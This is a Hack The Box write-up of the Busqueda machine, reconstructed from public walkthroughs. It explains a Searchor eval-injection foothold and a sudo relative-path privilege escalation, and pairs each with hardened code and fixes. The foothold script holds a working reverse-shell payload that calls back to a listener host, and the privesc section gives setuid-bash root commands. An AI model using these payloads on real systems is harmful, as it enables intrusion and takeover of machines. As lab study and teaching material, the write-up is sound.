~ / foobarto.me / htb-machines

busqueda

Linux · Easy · released 2023-04-08 · retired 2023-08-12

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Busqueda is an Easy Linux box. The Flask front-end on searcher.htb hands the search query to Searchor 2.4.0, which interpolates it into a Python expression and calls eval() on it → RCE as svc. Privesc: svc may run /opt/scripts/system-checkup.py as root via sudo, and its full-checkup branch executes ./full-checkup.sh by relative path with no cwd set, so the script is resolved in whatever directory the sudo command was issued from → run it from a writable directory holding a full-checkup.sh that does chmod +s /bin/bash → root.

The chain:

  1. Search form: the query lands inside eval(f"... {query} ...") in Searchor 2.4.0 (CVE-2023-43364). A value of the form '+__import__("os").system("bash -c ...")+' closes the single-quoted string literal and splices Python into the expression. In a form-encoded body the + must be sent as %2B; a raw + decodes to a space and breaks the payload. → reverse shell as svc.
  2. ~/.gitconfig plus the checked-out app repo expose Gitea credentials; the same password works for svc, which is what sudo -l needs.
  3. sudo -l: (root) NOPASSWD: /usr/bin/python3 /opt/scripts/system-checkup.py *. The first argument selects a sub-command (docker-ps, full-checkup, ...). The full-checkup branch runs subprocess.Popen(['./full-checkup.sh']): relative path, shell=False, no cwd argument, so the script is looked up in whatever directory the sudo command was run from.
  4. Drop /tmp/full-checkup.sh:
    #!/bin/bash
    chmod +s /bin/bash

     Run the sudo invocation from /tmp. → root.

Recon

22/tcp     OpenSSH
80/tcp     Apache → searcher.htb (Flask + Searchor 2.4.0)

Foothold — Searchor eval injection

import requests

# Searchor 2.4.0 builds the call as a string and eval()s it:
#   eval(f"Engine.{engine.title()}.search('{query}', copy_url=False, open_web=False)")
# The leading ' in the payload closes the query literal; os.system() runs while
# the call's arguments are being evaluated, before search() is ever reached.
# <C2> / <p>: listener host and port.
q = """', __import__('os').system('bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"'), '"""
# requests form-encodes the body, so the payload's quotes survive the trip
requests.post('http://searcher.htb/search', data={'engine': 'Bing', 'query': q})
# shell as svc arrives on the listener
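Added example, mine rather than the box's app.py or Searchor's own code: a stand-in Engine enum with the eval() pattern from step 1 next to an eval-free lookup, plus the form-decoding wrinkle (+ versus %2B). The Engine class and its URLs, the function names, and the payload are constructed for the demo; the reverse-shell command is replaced by a harmless shell command whose output is spliced into the returned URL, which is enough to prove the expression ran.

```python
import urllib.parse
from enum import Enum


class Engine(Enum):
    """Constructed stand-in for searchor's Engine enum (not the real class)."""
    Bing = "https://www.bing.com/search?q="
    Google = "https://www.google.com/search?q="

    def search(self, query, copy_url=False, open_web=False):
        # Real searchor builds a URL; the query is URL-quoted into it.
        return self.value + urllib.parse.quote(query, safe="")


def vulnerable_search(engine, query):
    # Searchor 2.4.0 pattern: request fields are pasted into Python source and
    # eval()ed, so whatever closes the string literal becomes code.
    return eval(f"Engine.{engine}.search('{query}', copy_url=False, open_web=False)")


def hardened_search(engine, query):
    # Same feature without eval: look the engine up by name, pass the query as data.
    try:
        target = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return target.search(query, copy_url=False, open_web=False)


# Constructed payload: closes the literal, runs a command, reopens the literal
# so the expression stays syntactically valid. The popen() stands in for the
# bash reverse shell; its output (upper-cased so it differs from the payload
# text itself) ends up inside the returned URL.
PAYLOAD = "'+__import__('os').popen('echo rce-ok | tr a-z A-Z').read().strip()+'"


def encode_form(engine, query):
    # What requests.post(..., data={...}) sends: '+' travels as %2B, quotes as %27.
    return urllib.parse.urlencode({"engine": engine, "query": query})


def form_decode(body):
    # Flask decodes the body with application/x-www-form-urlencoded rules:
    # a raw '+' becomes a space, which is why the payload's + must be sent as %2B.
    return urllib.parse.parse_qs(body, keep_blank_values=True)["query"][0]


if __name__ == "__main__":
    print(vulnerable_search("Bing", PAYLOAD))       # URL contains RCE-OK: the command ran
    print(hardened_search("Bing", PAYLOAD))         # payload URL-quoted, nothing executed
    print(form_decode(encode_form("Bing", PAYLOAD)) == PAYLOAD)   # True: %2B survives
    print(form_decode("engine=Bing&query=" + PAYLOAD) == PAYLOAD)  # False: + became a space
```

The space-decoded variant is not merely weaker; fed to the vulnerable function it is a SyntaxError inside eval(), which is the usual symptom when a copied payload "does nothing".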

Privesc — sudo system-checkup.py + relative path

$ sudo -l
(root) NOPASSWD: /usr/bin/python3 /opt/scripts/system-checkup.py *

$ cat /opt/scripts/system-checkup.py
... if sys.argv[1] == 'full-checkup':
        subprocess.Popen(['./full-checkup.sh'])   # relative path, no cwd= : resolved in the caller's cwd

$ cd /tmp                                          # any directory svc can write to
$ cat > full-checkup.sh <<'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF
$ chmod +x full-checkup.sh
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup   # sudo keeps /tmp as cwd, so root runs /tmp/full-checkup.sh
$ /bin/bash -p                                     # -p keeps the setuid euid; check: ls -l /bin/bash shows rwsr-sr-x
# root
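Added example, not the box's system-checkup.py: a simulation of the relative-path bug beside what a safe version of the same branch checks. The function names, the temporary directory and the planted script are constructed for the demo; the planted script echoes a marker instead of running chmod +s /bin/bash, and the caller_cwd parameter stands in for the directory the operator typed sudo in.

```python
import os
import stat
import subprocess
import tempfile

CHECKUP = "full-checkup.sh"


def vulnerable_full_checkup(caller_cwd):
    # What system-checkup.py does: relative path, no cwd argument. caller_cwd is
    # the directory the operator ran `sudo ...` from; sudo does not change it,
    # so that is where ./full-checkup.sh gets resolved.
    proc = subprocess.run(["./" + CHECKUP], cwd=caller_cwd,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_full_checkup(script_dir):
    # Absolute path rooted in a fixed directory, a refusal to run anything that
    # is not root-owned or is group/world-writable, and a run from '/' with a
    # fixed PATH so the caller's cwd and environment play no part.
    path = os.path.join(os.path.abspath(script_dir), CHECKUP)
    st = os.stat(path)
    if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"refusing {path}: not root-owned or writable by others")
    proc = subprocess.run([path], cwd="/",
                          env={"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def plant_attacker_script(directory):
    # Constructed stand-in for the full-checkup.sh dropped in /tmp: it prints a
    # marker instead of chmod +s /bin/bash, and is world-writable like a /tmp drop.
    path = os.path.join(directory, CHECKUP)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho attacker-script-ran\n")
    os.chmod(path, 0o777)
    return path


def demo():
    # Returns (what the vulnerable branch printed, whether the hardened one refused).
    workdir = tempfile.mkdtemp()
    plant_attacker_script(workdir)
    hijacked = vulnerable_full_checkup(workdir)
    try:
        hardened_full_checkup(workdir)
        refused = False
    except PermissionError:
        refused = True
    return hijacked, refused


if __name__ == "__main__":
    print(demo())   # ('attacker-script-ran', True)
```

The ownership and mode check is what matters once the path is absolute: a root-owned /opt/scripts/full-checkup.sh that is world-writable is the same bug with one extra step.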

Why each step worked

  1. Searchor pastes request fields into Python source before eval(); the quote that ends the query literal ends the attacker's confinement. Nothing escapes or validates the input first.
  2. The Gitea password left in the checked-out repo was also svc's password, so one leaked secret unlocked sudo.
  3. sudo runs the command in the caller's working directory, and the sudoers entry allows any arguments (*); a relative path in a root-run script is therefore resolved in a directory the low-privileged user chooses.

Counterfactuals

  1. Engine[engine].search(query) instead of eval(f"..."): the query is only ever a string argument and the foothold disappears.
  2. subprocess.Popen(['/opt/scripts/full-checkup.sh']), or a cwd pinned to the script's own directory: the /tmp copy is never consulted. A sudoers line restricted to specific sub-commands instead of * narrows what svc can reach as root.
  3. Distinct passwords for Gitea and the svc account, and no credentials committed to the repo: svc never gets to sudo -l at all.
Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
